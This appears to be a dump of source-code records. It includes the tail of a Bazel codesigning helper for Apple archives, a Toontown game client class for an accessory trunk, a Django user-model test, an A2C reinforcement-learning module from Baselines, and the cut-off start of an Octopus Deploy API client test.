processed or signed.\n output_archive: The `File` representing the processed and signed archive.\n output_archive_root_path: The `string` path to where the processed, uncompressed archive\n should be located.\n signed_frameworks: Depset containing each framework that has already been signed.\n entitlements: Optional file representing the entitlements to sign with.\n \"\"\"\n input_files = [input_archive]\n processing_tools = []\n\n signing_command_lines = _codesigning_command(\n ctx,\n entitlements,\n frameworks_path,\n signed_frameworks,\n bundle_path = archive_codesigning_path,\n )\n if signing_command_lines:\n processing_tools.append(ctx.executable._codesigningtool)\n if entitlements:\n input_files.append(entitlements)\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n if provisioning_profile:\n input_files.append(provisioning_profile)\n\n ipa_post_processor = ctx.executable.ipa_post_processor\n ipa_post_processor_path = \"\"\n if ipa_post_processor:\n processing_tools.append(ipa_post_processor)\n ipa_post_processor_path = ipa_post_processor.path\n\n # Only compress the IPA for optimized (release) builds or when requested.\n # For debug builds, zip without compression, which will speed up the build.\n compression_requested = defines.bool_value(ctx, \"apple.compress_ipa\", False)\n should_compress = (ctx.var[\"COMPILATION_MODE\"] == \"opt\") or compression_requested\n\n # TODO(b/163217926): These are kept the same for the three different actions\n # that could be run to ensure anything keying off these values continues to\n # work. 
After some data is collected, the values likely can be revisited and\n # changed.\n mnemonic = \"ProcessAndSign\"\n progress_message = \"Processing and signing %s\" % ctx.label.name\n\n # If there is no work to be done, skip the processing/signing action, just\n # copy the file over.\n has_work = any([signing_command_lines, ipa_post_processor_path, should_compress])\n if not has_work:\n ctx.actions.run_shell(\n inputs = [input_archive],\n outputs = [output_archive],\n mnemonic = mnemonic,\n progress_message = progress_message,\n command = \"cp -p '%s' '%s'\" % (input_archive.path, output_archive.path),\n )\n return\n\n process_and_sign_template = intermediates.file(\n ctx.actions,\n ctx.label.name,\n \"process-and-sign-%s.sh\" % hash(output_archive.path),\n )\n ctx.actions.expand_template(\n template = ctx.file._process_and_sign_template,\n output = process_and_sign_template,\n is_executable = True,\n substitutions = {\n \"%ipa_post_processor%\": ipa_post_processor_path or \"\",\n \"%output_path%\": output_archive.path,\n \"%should_compress%\": \"1\" if should_compress else \"\",\n \"%signing_command_lines%\": signing_command_lines,\n \"%unprocessed_archive_path%\": input_archive.path,\n \"%work_dir%\": output_archive_root_path,\n },\n )\n\n # Build up some arguments for the script to allow logging to tell what work\n # is being done within the action's script.\n arguments = []\n if signing_command_lines:\n arguments.append(\"should_sign\")\n if ipa_post_processor_path:\n arguments.append(\"should_process\")\n if should_compress:\n arguments.append(\"should_compress\")\n\n run_on_darwin = any([signing_command_lines, ipa_post_processor_path])\n if run_on_darwin:\n legacy_actions.run(\n ctx,\n inputs = input_files,\n outputs = [output_archive],\n executable = process_and_sign_template,\n arguments = arguments,\n mnemonic = mnemonic,\n progress_message = progress_message,\n execution_requirements = {\n # Added so that the output of this action is not cached remotely, in case multiple\n # developers sign the same artifact with different identities.\n \"no-cache\": \"1\",\n # Unsure, but may be needed for keychain access, especially for files that live in\n # $HOME.\n \"no-sandbox\": \"1\",\n },\n tools = processing_tools,\n )\n else:\n ctx.actions.run(\n inputs = input_files,\n outputs = [output_archive],\n executable = process_and_sign_template,\n arguments = arguments,\n mnemonic = mnemonic,\n progress_message = progress_message,\n )\n\ndef _sign_binary_action(ctx, input_binary, output_binary):\n \"\"\"Signs the input binary file, copying it into the given output binary file.\n\n Args:\n ctx: The target's rule context.\n input_binary: The `File` representing the binary to be signed.\n output_binary: The `File` representing signed binary.\n \"\"\"\n\n # It's not hermetic to sign the binary that was built by the apple_binary\n # target that this rule takes as an input, so we copy it and then execute the\n # code signing commands on that copy in the same action.\n path_to_sign = _path_to_sign(output_binary.path)\n signing_commands = _signing_command_lines(\n ctx,\n [path_to_sign],\n None,\n )\n\n legacy_actions.run_shell(\n ctx,\n inputs = [input_binary],\n outputs = [output_binary],\n command = [\n \"/bin/bash\",\n \"-c\",\n \"cp {input_binary} {output_binary}\".format(\n input_binary = input_binary.path,\n output_binary = output_binary.path,\n ) + \"\\n\" + signing_commands,\n ],\n mnemonic = \"SignBinary\",\n execution_requirements = {\n # Added so that the output of this action is not 
cached remotely, in case multiple\n # developers sign the same artifact with different identities.\n \"no-cache\": \"1\",\n # Unsure, but may be needed for keychain access, especially for files that live in\n # $HOME.\n \"no-sandbox\": \"1\",\n },\n tools = [\n ctx.executable._codesigningtool,\n ],\n )\n\ncodesigning_support = struct(\n codesigning_args = _codesigning_args,\n codesigning_command = _codesigning_command,\n post_process_and_sign_archive_action = _post_process_and_sign_archive_action,\n provisioning_profile = _provisioning_profile,\n sign_binary_action = _sign_binary_action,\n)\n"} {"ext": "py", "sha": "1a2f50f2434ae8e043b6001f11ce27ca488d5dc3", "content": "from panda3d.core import *\nfrom direct.gui.DirectGui import *\nfrom direct.task.Task import Task\nfrom direct.interval.IntervalGlobal import *\nimport DistributedCloset, ClosetGlobals, TrunkGUI\nfrom toontown.toon import ToonDNA\nfrom toontown.toonbase import TTLocalizer\nfrom toontown.toonbase import ToontownGlobals\nN_A = 0\n\nclass DistributedTrunk(DistributedCloset.DistributedCloset):\n notify = directNotify.newCategory('DistributedTrunk')\n\n def __init__(self, cr):\n DistributedCloset.DistributedCloset.__init__(self, cr)\n self.hatList = []\n self.glassesList = []\n self.backpackList = []\n self.shoesList = []\n self.oldHatList = []\n self.oldGlassesList = []\n self.oldBackpackList = []\n self.oldShoesList = []\n self.swapHatEvent = ''\n self.swapGlassesEvent = ''\n self.swapBackpackEvent = ''\n self.swapShoesEvent = ''\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n self.isFreePlayer = 0\n\n def printInfo(self):\n print 'avid: %s, gender: %s' % (self.av.doId, self.av.style.gender)\n print 'current hat = %s, glasses = %s, backpack = %s, shoes = %s' % (self.av.getHat(),\n self.av.getGlasses(),\n self.av.getBackpack(),\n self.av.getShoes())\n print 'hatList = %s' % self.av.getHatList()\n print 'glassesList = %s' % self.av.getGlassesList()\n print 'backpackList = %s' % self.av.getBackpackList()\n print 'shoesList = %s' % self.av.getShoesList()\n\n def setState(self, mode, avId, ownerId, gender, hatList, glassesList, backpackList, shoesList):\n self.notify.debug('setState, mode=%s, avId=%s, ownerId=%d' % (mode, avId, ownerId))\n self.isOwner = avId == ownerId\n self.ownerGender = gender\n if mode == ClosetGlobals.CLOSED:\n self.fsm.request('closed')\n return\n else:\n if mode == ClosetGlobals.OPEN:\n self.customerId = avId\n self.av = self.cr.doId2do.get(self.customerId, None)\n if self.av:\n if self.av.getGameAccess() != ToontownGlobals.AccessFull:\n self.isOwner = 0\n self.isFreePlayer = 1\n else:\n self.isFreePlayer = 0\n if base.localAvatar.getDoId() == self.customerId:\n self.gender = self.av.style.gender\n self.hatList = hatList\n self.glassesList = glassesList\n self.backpackList = backpackList\n self.shoesList = shoesList\n self.oldHatList = self.hatList[0:]\n self.oldGlassesList = self.glassesList[0:]\n self.oldBackpackList = self.backpackList[0:]\n self.oldShoesList = self.shoesList[0:]\n print '-----------Starting trunk interaction-----------'\n self.printInfo()\n print '-------------------------------------------------'\n if not self.isOwner:\n self.__popupNotOwnerPanel()\n else:\n taskMgr.doMethodLater(0.5, self.popupChangeClothesGUI, self.uniqueName('popupChangeClothesGUI'))\n self.fsm.request('open')\n return\n\n def load(self):\n lNode = self.find('**/lid_origin')\n lLid = self.find('**/lid')\n if lNode.isEmpty() or lLid.isEmpty():\n self.lid = None\n 
else:\n lLid.wrtReparentTo(lNode)\n self.lid = lNode\n if not lNode.isEmpty():\n self.scale = lLid.getScale()[0] * 0.6\n return\n\n def popupChangeClothesGUI(self, task):\n self.notify.debug('popupChangeClothesGUI')\n self.purchaseDoneEvent = self.uniqueName('purchaseDone')\n self.swapHatEvent = self.uniqueName('swapHat')\n self.swapGlassesEvent = self.uniqueName('swapGlasses')\n self.swapBackpackEvent = self.uniqueName('swapBackpack')\n self.swapShoesEvent = self.uniqueName('swapShoes')\n self.cancelEvent = self.uniqueName('cancel')\n self.accept(self.purchaseDoneEvent, self.__proceedToCheckout)\n self.accept(self.swapHatEvent, self.__handleSwapHat)\n self.accept(self.swapGlassesEvent, self.__handleSwapGlasses)\n self.accept(self.swapBackpackEvent, self.__handleSwapBackpack)\n self.accept(self.swapShoesEvent, self.__handleSwapShoes)\n self.accept(self.cancelEvent, self._handleCancel)\n self.deleteEvent = self.uniqueName('delete')\n if self.isOwner:\n self.accept(self.deleteEvent, self.__handleDelete)\n if not self.closetGUI:\n self.closetGUI = TrunkGUI.TrunkGUI(self.isOwner, self.purchaseDoneEvent, self.cancelEvent, self.swapHatEvent, self.swapGlassesEvent, self.swapBackpackEvent, self.swapShoesEvent, self.deleteEvent, self.hatList, self.glassesList, self.backpackList, self.shoesList)\n self.closetGUI.load()\n if self.gender != self.ownerGender:\n self.closetGUI.setGender(self.ownerGender)\n self.closetGUI.enter(base.localAvatar)\n self.closetGUI.showButtons()\n oldHat = self.av.getHat()\n oldGlasses = self.av.getGlasses()\n oldBackpack = self.av.getBackpack()\n oldShoes = self.av.getShoes()\n self.oldStyle = {ToonDNA.HAT: oldHat, ToonDNA.GLASSES: oldGlasses, \n ToonDNA.BACKPACK: oldBackpack, \n ToonDNA.SHOES: oldShoes}\n return Task.done\n\n def resetCloset(self):\n self.ignoreAll()\n taskMgr.remove(self.uniqueName('popupChangeClothesGUI'))\n taskMgr.remove(self.uniqueName('lerpCamera'))\n taskMgr.remove(self.uniqueName('lerpToon'))\n if self.closetGUI:\n self.closetGUI.hideButtons()\n self.closetGUI.exit()\n self.closetGUI.unload()\n self.closetGUI = None\n del self.av\n self.av = base.localAvatar\n oldHat = self.av.getHat()\n oldGlasses = self.av.getGlasses()\n oldBackpack = self.av.getBackpack()\n oldShoes = self.av.getShoes()\n self.oldStyle = {ToonDNA.HAT: oldHat, ToonDNA.GLASSES: oldGlasses, \n ToonDNA.BACKPACK: oldBackpack, \n ToonDNA.SHOES: oldShoes}\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n return Task.done\n\n def _handleCancel(self):\n if self.oldStyle:\n oldHat = self.oldStyle[ToonDNA.HAT]\n oldGlasses = self.oldStyle[ToonDNA.GLASSES]\n oldBackpack = self.oldStyle[ToonDNA.BACKPACK]\n oldShoes = self.oldStyle[ToonDNA.SHOES]\n self.d_setDNA(oldHat[0], oldHat[1], oldHat[2], oldGlasses[0], oldGlasses[1], oldGlasses[2], oldBackpack[0], oldBackpack[1], oldBackpack[2], oldShoes[0], oldShoes[1], oldShoes[2], 1)\n else:\n self.notify.info('avoided crash in handleCancel')\n self._handlePurchaseDone()\n if self.closetGUI:\n self.closetGUI.resetClothes(self.oldStyle)\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n return\n\n def __handleSwapHat(self):\n item = self.av.getHat()\n self.d_setDNA(item[0], item[1], item[2], N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, 0, ToonDNA.HAT)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapGlasses(self):\n item = self.av.getGlasses()\n self.d_setDNA(N_A, N_A, N_A, item[0], item[1], item[2], N_A, N_A, N_A, N_A, N_A, N_A, 0, 
ToonDNA.GLASSES)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapBackpack(self):\n item = self.av.getBackpack()\n self.d_setDNA(N_A, N_A, N_A, N_A, N_A, N_A, item[0], item[1], item[2], N_A, N_A, N_A, 0, ToonDNA.BACKPACK)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapShoes(self):\n item = self.av.getShoes()\n self.d_setDNA(N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, item[0], item[1], item[2], 0, ToonDNA.SHOES)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleDelete(self, which):\n if which == ToonDNA.HAT:\n itemList = self.closetGUI.hats\n trashIndex = self.closetGUI.hatChoice\n swapFunc = self.closetGUI.swapHat\n removeFunc = self.closetGUI.removeHat\n trashItem = self.av.getHat()\n self.hatDeleted = self.hatDeleted | 1\n elif which == ToonDNA.GLASSES:\n itemList = self.closetGUI.glasses\n trashIndex = self.closetGUI.glassesChoice\n swapFunc = self.closetGUI.swapGlasses\n removeFunc = self.closetGUI.removeGlasses\n trashItem = self.av.getGlasses()\n self.glassesDeleted = self.glassesDeleted | 1\n elif which == ToonDNA.BACKPACK:\n itemList = self.closetGUI.backpacks\n trashIndex = self.closetGUI.backpackChoice\n swapFunc = self.closetGUI.swapBackpack\n removeFunc = self.closetGUI.removeBackpack\n trashItem = self.av.getBackpack()\n self.backpackDeleted = self.backpackDeleted | 1\n elif which == ToonDNA.SHOES:\n itemList = self.closetGUI.shoes\n trashIndex = self.closetGUI.shoesChoice\n swapFunc = self.closetGUI.swapShoes\n removeFunc = self.closetGUI.removeShoes\n trashItem = self.av.getShoes()\n self.shoesDeleted = self.shoesDeleted | 1\n else:\n self.notify.warning(\"we don't know about this item(type = %s)\" % which)\n return\n if len(itemList) > 1:\n if trashIndex == 0:\n swapFunc(1)\n else:\n swapFunc(-1)\n removeFunc(trashIndex)\n self.sendUpdate('removeItem', [trashItem[0],\n trashItem[1],\n trashItem[2],\n which])\n swapFunc(0)\n self.closetGUI.updateTrashButtons()\n else:\n self.notify.warning(\"cant delete this item(type = %s), since we don't have a replacement\" % which)\n\n def resetItemLists(self):\n self.hatList = self.oldHatList[0:]\n self.glassesList = self.oldGlassesList[0:]\n self.backpackList = self.oldBackpackList[0:]\n self.shoesList = self.oldShoesList[0:]\n self.closetGUI.hat = self.hatList\n self.closetGUI.glasses = self.glassesList\n self.closetGUI.backpack = self.backpackList\n self.closetGUI.shoes = self.shoesList\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n\n def __proceedToCheckout(self):\n if self.hatDeleted or self.glassesDeleted or self.backpackDeleted or self.shoesDeleted:\n self.__popupAreYouSurePanel()\n else:\n self._handlePurchaseDone()\n\n def _handlePurchaseDone(self, timeout=0):\n if timeout == 1:\n oldHat = self.oldStyle[ToonDNA.HAT]\n oldGlasses = self.oldStyle[ToonDNA.GLASSES]\n oldBackpack = self.oldStyle[ToonDNA.BACKPACK]\n oldShoes = self.oldStyle[ToonDNA.SHOES]\n self.d_setDNA(oldHat[0], oldHat[1], oldHat[2], oldGlasses[0], oldGlasses[1], oldGlasses[2], oldBackpack[0], oldBackpack[1], oldBackpack[2], oldShoes[0], oldShoes[1], oldShoes[2], 1)\n else:\n which = 0\n if hasattr(self.closetGUI, 'hatChoice') and hasattr(self.closetGUI, 'glassesChoice') and hasattr(self.closetGUI, 'backpackChoice') and hasattr(self.closetGUI, 'shoesChoice'):\n if self.closetGUI.hatChoice != 0 or self.hatDeleted:\n which = which | ToonDNA.HAT\n if self.closetGUI.glassesChoice != 0 or self.glassesDeleted:\n which = which | 
ToonDNA.GLASSES\n if self.closetGUI.backpackChoice != 0 or self.backpackDeleted:\n which = which | ToonDNA.BACKPACK\n if self.closetGUI.shoesChoice != 0 or self.shoesDeleted:\n which = which | ToonDNA.SHOES\n hat = self.av.getHat()\n glasses = self.av.getGlasses()\n backpack = self.av.getBackpack()\n shoes = self.av.getShoes()\n self.d_setDNA(hat[0], hat[1], hat[2], glasses[0], glasses[1], glasses[2], backpack[0], backpack[1], backpack[2], shoes[0], shoes[1], shoes[2], 2, which)\n\n def d_setDNA(self, hatIdx, hatTexture, hatColor, glassesIdx, glassesTexture, glassesColor, backpackIdx, backpackTexture, backpackColor, shoesIdx, shoesTexture, shoesColor, finished, which=ToonDNA.HAT | ToonDNA.GLASSES | ToonDNA.BACKPACK | ToonDNA.SHOES):\n self.sendUpdate('setDNA', [hatIdx,\n hatTexture,\n hatColor,\n glassesIdx,\n glassesTexture,\n glassesColor,\n backpackIdx,\n backpackTexture,\n backpackColor,\n shoesIdx,\n shoesTexture,\n shoesColor,\n finished,\n which])\n\n def setCustomerDNA(self, avId, hatIdx, hatTexture, hatColor, glassesIdx, glassesTexture, glassesColor, backpackIdx, backpackTexture, backpackColor, shoesIdx, shoesTexture, shoesColor, which):\n if avId and avId != base.localAvatar.doId:\n av = base.cr.doId2do.get(avId, None)\n if av:\n if self.av == base.cr.doId2do[avId]:\n if which & ToonDNA.HAT:\n self.av.setHat(hatIdx, hatTexture, hatColor)\n if which & ToonDNA.GLASSES:\n self.av.setGlasses(glassesIdx, glassesTexture, glassesColor)\n if which & ToonDNA.BACKPACK:\n self.av.setBackpack(backpackIdx, backpackTexture, backpackColor)\n if which & ToonDNA.SHOES:\n self.av.setShoes(shoesIdx, shoesTexture, shoesColor)\n self.av.generateToonAccessories()\n return\n\n def __popupNotOwnerPanel(self):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n self.purchaseDoneEvent = self.uniqueName('purchaseDone')\n self.swapHatEvent = self.uniqueName('swapHat')\n self.swapGlassesEvent = self.uniqueName('swapGlasses')\n self.swapBackpackEvent = self.uniqueName('swapBackpack')\n self.swapShoesEvent = self.uniqueName('swapShoes')\n self.cancelEvent = self.uniqueName('cancel')\n self.accept(self.purchaseDoneEvent, self.__proceedToCheckout)\n self.accept(self.swapHatEvent, self.__handleSwapHat)\n self.accept(self.swapGlassesEvent, self.__handleSwapGlasses)\n self.accept(self.swapBackpackEvent, self.__handleSwapBackpack)\n self.accept(self.swapShoesEvent, self.__handleSwapShoes)\n self.accept(self.cancelEvent, self._handleCancel)\n self.deleteEvent = self.uniqueName('delete')\n if self.isOwner:\n self.accept(self.deleteEvent, self.__handleDelete)\n buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n if self.isFreePlayer:\n textMsg = TTLocalizer.TrunkNotPaidMessage\n else:\n textMsg = TTLocalizer.TrunkNotOwnerMessage\n self.popupInfo = DirectFrame(parent=hidden, relief=None, state='normal', text=textMsg, frameSize=(-1,\n 1,\n -1,\n 1), text_wordwrap=10, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(0.88,\n 1,\n 0.55), geom_pos=(0,\n 0,\n -0.08), text_scale=0.08, text_pos=(0,\n 0.06))\n DirectButton(self.popupInfo, image=okButtonImage, relief=None, text=TTLocalizer.ClosetPopupOK, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(0.0,\n 0.0,\n -0.21), command=self._handleNotOwnerMessageOK)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n return\n\n def 
__popupAreYouSurePanel(self):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n cancelButtonImage = (buttons.find('**/CloseBtn_UP'), buttons.find('**/CloseBtn_DN'), buttons.find('**/CloseBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent=hidden, relief=None, state='normal', text=TTLocalizer.TrunkAreYouSureMessage, frameSize=(-1,\n 1,\n -1,\n 1), text_wordwrap=10, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(0.88,\n 1,\n 0.55), geom_pos=(0,\n 0,\n -0.08), text_scale=0.08, text_pos=(0,\n 0.08))\n DirectButton(self.popupInfo, image=okButtonImage, relief=None, text=TTLocalizer.ClosetPopupOK, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(-0.1,\n 0.0,\n -0.21), command=self._handleYesImSure)\n DirectButton(self.popupInfo, image=cancelButtonImage, relief=None, text=TTLocalizer.ClosetPopupCancel, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(0.1,\n 0.0,\n -0.21), command=self._handleNotSure)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n return\n\n def _openDoors(self):\n if self.closetTrack:\n self.closetTrack.finish()\n openHpr = Vec3(0, -80, 0)\n if self.av:\n self.av.applyCheesyEffect(ToontownGlobals.CENormal)\n self.closetTrack = Parallel()\n if self.lid:\n self.closetTrack.append(self.lid.hprInterval(0.5, openHpr))\n self.closetTrack.start()\n\n def _closeDoors(self):\n if self.closetTrack:\n self.closetTrack.finish()\n closeHpr = Vec3(0, 0, 0)\n if self.av:\n self.av.reconsiderCheesyEffect()\n self.closetTrack = Parallel()\n if self.lid:\n self.closetTrack.append(self.lid.hprInterval(0.5, closeHpr))\n self.closetTrack.start()"} {"ext": "py", "sha": "1a2f5181a9936e57ec9cd7a2a19c2fae6dc7cd65", "content": "from django.test import TestCase\nfrom django.contrib.auth import get_user_model\n\n\nclass ModelTests(TestCase):\n\n def test_create_user_with_email_successful(self):\n email = 'kamransadixov@mail.ru'\n password = 'kam125486'\n\n \"\"\"\n get_user_model() returns the default user model.\n If it has to return custom usermodel, create a new model\n and in settings.py Set AUTH_USER_MODEL pointing to custom model\n \"\"\"\n user = get_user_model().objects.create_user(\n email=email,\n password=password\n )\n\n self.assertEqual(user.email, email)\n self.assertTrue(user.check_password(password))\n\n def test_new_user_email_normalize(self):\n email = 'tets@SADASD.com'\n user = get_user_model().objects.create_user(email, 'kam125486')\n\n self.assertEqual(user.email, email.lower())\n\n def test_new_user_invalid_email(self):\n \"\"\"Test email user with no email raises error\"\"\"\n with self.assertRaises(ValueError):\n get_user_model().objects.create_user(None, 'kam125486')\n\n def test_create_new_superuser(self):\n user = get_user_model().objects.create_superuser(\n 'kamransadikhov@yandex.com',\n 'kam125486'\n )\n\n self.assertTrue(user.is_superuser)\n self.assertTrue(user.is_staff)\n"} {"ext": "py", "sha": "1a2f51ef1dc8277bf84dd1bc84b6dd06be963ddc", "content": "import os.path as osp\nimport time\nimport joblib\nimport numpy as np\nimport tensorflow as tf\nfrom baselines import logger\nfrom collections import deque\n\nfrom baselines.common import set_global_seeds, explained_variance\nfrom baselines.common.runners import AbstractEnvRunner\nfrom baselines.common import 
tf_util\n\nfrom baselines.a2c.utils import discount_with_dones\nfrom baselines.a2c.utils import Scheduler, make_path, find_trainable_variables\nfrom baselines.a2c.utils import cat_entropy, mse\n\nclass Model(object):\n\n def __init__(self, policy, ob_space, ac_space, nenvs, nsteps,\n ent_coef=0.01, vf_coef=0.5, max_grad_norm=0.5, lr=7e-4,\n alpha=0.99, epsilon=1e-5, total_timesteps=int(80e6), lrschedule='linear'):\n\n sess = tf_util.make_session()\n nbatch = nenvs*nsteps\n\n A = tf.placeholder(tf.int32, [nbatch])\n ADV = tf.placeholder(tf.float32, [nbatch])\n R = tf.placeholder(tf.float32, [nbatch])\n LR = tf.placeholder(tf.float32, [])\n\n step_model = policy(sess, ob_space, ac_space, nenvs, 1, reuse=False)\n train_model = policy(sess, ob_space, ac_space, nenvs*nsteps, nsteps, reuse=True)\n\n neglogpac = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=train_model.pi, labels=A)\n pg_loss = tf.reduce_mean(ADV * neglogpac)\n vf_loss = tf.reduce_mean(mse(tf.squeeze(train_model.vf), R))\n entropy = tf.reduce_mean(cat_entropy(train_model.pi))\n loss = pg_loss - entropy*ent_coef + vf_loss * vf_coef\n\n params = find_trainable_variables(\"model\")\n grads = tf.gradients(loss, params)\n if max_grad_norm is not None:\n grads, grad_norm = tf.clip_by_global_norm(grads, max_grad_norm)\n grads = list(zip(grads, params))\n trainer = tf.train.RMSPropOptimizer(learning_rate=LR, decay=alpha, epsilon=epsilon)\n _train = trainer.apply_gradients(grads)\n\n lr = Scheduler(v=lr, nvalues=total_timesteps, schedule=lrschedule)\n\n def train(obs, states, rewards, masks, actions, values):\n advs = rewards - values\n for step in range(len(obs)):\n cur_lr = lr.value()\n td_map = {train_model.X:obs, A:actions, ADV:advs, R:rewards, LR:cur_lr}\n if states is not None:\n td_map[train_model.S] = states\n td_map[train_model.M] = masks\n policy_loss, value_loss, policy_entropy, _ = sess.run(\n [pg_loss, vf_loss, entropy, _train],\n td_map\n )\n return policy_loss, value_loss, policy_entropy\n\n def save(save_path):\n ps = sess.run(params)\n make_path(osp.dirname(save_path))\n joblib.dump(ps, save_path)\n\n def load(load_path):\n loaded_params = joblib.load(load_path)\n restores = []\n for p, loaded_p in zip(params, loaded_params):\n restores.append(p.assign(loaded_p))\n sess.run(restores)\n\n self.train = train\n self.train_model = train_model\n self.step_model = step_model\n self.step = step_model.step\n self.value = step_model.value\n self.initial_state = step_model.initial_state\n self.save = save\n self.load = load\n tf.global_variables_initializer().run(session=sess)\n\nclass Runner(AbstractEnvRunner):\n\n def __init__(self, env, model, nsteps=5, gamma=0.99):\n super().__init__(env=env, model=model, nsteps=nsteps)\n self.gamma = gamma\n self.episodes_count = 0\n\n def run(self):\n mb_obs, mb_rewards, mb_actions, mb_values, mb_dones = [],[],[],[],[]\n mb_states = self.states\n epinfos = []\n for n in range(self.nsteps):\n actions, values, states, _ = self.model.step(self.obs, self.states, self.dones)\n mb_obs.append(np.copy(self.obs))\n mb_actions.append(actions)\n mb_values.append(values)\n mb_dones.append(self.dones)\n obs, rewards, dones, infos = self.env.step(actions)\n for info in infos:\n maybeepinfo = info.get('episode')\n if maybeepinfo:\n self.episodes_count += 1\n epinfos.append(maybeepinfo)\n \n self.states = states\n self.dones = dones\n for n, done in enumerate(dones):\n if done:\n self.obs[n] = self.obs[n]*0\n self.obs = obs\n mb_rewards.append(rewards)\n mb_dones.append(self.dones)\n #batch of steps 
to batch of rollouts\n mb_obs = np.asarray(mb_obs, dtype=np.uint8).swapaxes(1, 0).reshape(self.batch_ob_shape)\n mb_rewards = np.asarray(mb_rewards, dtype=np.float32).swapaxes(1, 0)\n mb_actions = np.asarray(mb_actions, dtype=np.int32).swapaxes(1, 0)\n mb_values = np.asarray(mb_values, dtype=np.float32).swapaxes(1, 0)\n mb_dones = np.asarray(mb_dones, dtype=np.bool).swapaxes(1, 0)\n mb_masks = mb_dones[:, :-1]\n mb_dones = mb_dones[:, 1:]\n last_values = self.model.value(self.obs, self.states, self.dones).tolist()\n #discount/bootstrap off value fn\n for n, (rewards, dones, value) in enumerate(zip(mb_rewards, mb_dones, last_values)):\n rewards = rewards.tolist()\n dones = dones.tolist()\n if dones[-1] == 0:\n rewards = discount_with_dones(rewards+[value], dones+[0], self.gamma)[:-1]\n else:\n rewards = discount_with_dones(rewards, dones, self.gamma)\n mb_rewards[n] = rewards\n mb_rewards = mb_rewards.flatten()\n mb_actions = mb_actions.flatten()\n mb_values = mb_values.flatten()\n mb_masks = mb_masks.flatten()\n return mb_obs, mb_states, mb_rewards, mb_masks, mb_actions, mb_values, epinfos\n\ndef learn(policy, env, seed, nsteps=5, total_timesteps=int(80e6), vf_coef=0.5, ent_coef=0.01, max_grad_norm=0.5, lr=7e-4, lrschedule='linear', epsilon=1e-5, alpha=0.99, gamma=0.99, log_interval=100):\n set_global_seeds(seed)\n\n nenvs = env.num_envs\n ob_space = env.observation_space\n ac_space = env.action_space\n model = Model(policy=policy, ob_space=ob_space, ac_space=ac_space, nenvs=nenvs, nsteps=nsteps, ent_coef=ent_coef, vf_coef=vf_coef,\n max_grad_norm=max_grad_norm, lr=lr, alpha=alpha, epsilon=epsilon, total_timesteps=total_timesteps, lrschedule=lrschedule)\n runner = Runner(env, model, nsteps=nsteps, gamma=gamma)\n\n epinfobuf = deque(maxlen=100)\n\n nbatch = nenvs*nsteps\n tstart = time.time()\n for update in range(1, total_timesteps//nbatch+1):\n obs, states, rewards, masks, actions, values, epinfos = runner.run()\n epinfobuf.extend(epinfos)\n policy_loss, value_loss, policy_entropy = model.train(obs, states, rewards, masks, actions, values)\n nseconds = time.time()-tstart\n fps = int((update*nbatch)/nseconds)\n if update % log_interval == 0 or update == 1:\n ev = explained_variance(values, rewards)\n logger.record_tabular(\"nupdates\", update)\n logger.record_tabular(\"total_timesteps\", update*nbatch)\n logger.record_tabular(\"fps\", fps)\n logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))\n logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))\n logger.record_tabular(\"policy_entropy\", float(policy_entropy))\n logger.record_tabular(\"value_loss\", float(value_loss))\n logger.record_tabular(\"explained_variance\", float(ev))\n logger.logkv('time_elapsed', nseconds)\n logger.dump_tabular()\n logger.logkv('episodes', runner.episodes_count)\n env.close()\n return model\n\ndef safemean(xs):\n return np.nan if len(xs) == 0 else np.mean(xs)\n\n"} {"ext": "py", "sha": "1a2f526a0b6bfaf86b7b7d940e635a431f8a6643", "content": "# coding: utf-8\n\n\"\"\"\n Octopus Server API\n\n No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501\n\n OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport octopus_deploy_swagger_client\nfrom octopus_deploy_swagger_client.models.display_info import DisplayInfo # noqa: 
